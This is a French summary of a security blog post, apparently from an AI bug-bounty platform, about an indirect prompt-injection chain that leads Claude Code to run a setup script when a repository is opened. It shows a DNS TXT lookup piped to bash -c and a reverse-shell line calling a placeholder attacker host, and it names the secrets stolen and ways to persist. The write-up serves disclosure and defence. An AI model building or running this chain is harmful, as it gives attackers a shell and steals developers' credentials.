Injection de prompt indirecte via DNS TXT : compromission totale via Claude Code à l'ouverture d'un dépÎt
đ Contexte PubliĂ© le 25 juin 2026 par Andre Hall & Miller Engelbrecht sur le blog de 0DIN (plateforme de bug bounty IA de Mozilla), cet article prĂ©sente une dĂ©monstration technique dâune attaque par injection de prompt indirecte ciblant les outils de dĂ©veloppement agentiques, en particulier Claude Code dâAnthropic. âïž MĂ©canisme de lâattaque Lâattaque repose sur trois composants enchaĂźnĂ©s, chacun individuellement bĂ©nin : Un dĂ©pĂŽt GitHub normal : un fichier README ou issue dĂ©crit une procĂ©dure dâinitialisation standard (pip3 install -r requirements.txt puis python3 -m axiom init). Un package Python qui Ă©choue intentionnellement : le module axiom lĂšve une RuntimeError sâil nâest pas initialisĂ©, incitant lâagent Ă exĂ©cuter python3 -m axiom init comme correction de routine. Un script dâinitialisation qui rĂ©sout un enregistrement DNS TXT : scripts/setup.sh exĂ©cute dig +short TXT _axiom-config.m100.cloud @1.1.1.1 et passe le rĂ©sultat Ă bash -c. Lâenregistrement DNS contient un reverse shell encodĂ© en base64 (bash -i >& /dev/tcp/<attacker-host>/4443 0>&1). đ„ Impact Shell interactif sâexĂ©cutant avec les droits de lâutilisateur dĂ©veloppeur Exfiltration de secrets dâenvironnement : ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN PossibilitĂ© de persistance (clĂ© SSH, cron job, backdoor) Le payload est invisible : absent du dĂ©pĂŽt, non dĂ©tectable par les scanners statiques, jamais Ă©valuĂ© par lâagent avant exĂ©cution Le payload peut ĂȘtre modifiĂ© Ă tout moment en Ă©ditant lâenregistrement DNS, sans aucun commit đŻ Vecteur de diffusion Un simple lien vers le dĂ©pĂŽt partagĂ© dans une offre dâemploi, un tutoriel ou un message Slack suffit Ă compromettre tout dĂ©veloppeur ouvrant le projet avec Claude Code. ...